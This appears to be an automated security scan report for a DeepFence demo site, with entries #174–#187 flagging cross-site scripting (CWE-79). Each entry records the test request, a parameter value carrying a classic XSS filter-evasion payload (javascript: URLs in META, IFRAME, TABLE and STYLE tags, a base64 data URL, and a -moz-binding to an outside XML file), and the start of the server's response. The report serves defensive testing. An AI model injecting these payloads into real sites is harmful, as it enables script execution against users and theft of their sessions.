href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #174\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>BODY{-moz-binding:url(\"http://soapui.org/\nxssmoz.xml#xss\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #175\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <XSS STYLE=\"behavior: url(xss.htc);\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #176\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</\nSTYLE><UL><LI>XSS\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #177\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC='vbscript:msgbox(\"XSS\")'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #178\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"mocha:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79Issue Number #179\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"livescript:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #180\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io �script�alert(�XSS�)�/script�\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #181\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=\njavascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #182\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;\nbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #183\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://\n;URL=javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #184\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #185\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"><\n/FRAMESET>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #186\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <TABLE BACKGROUND=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io not be echoed back in the response\nCWE-ID CWE-79\nIssue Number #187\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\n\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 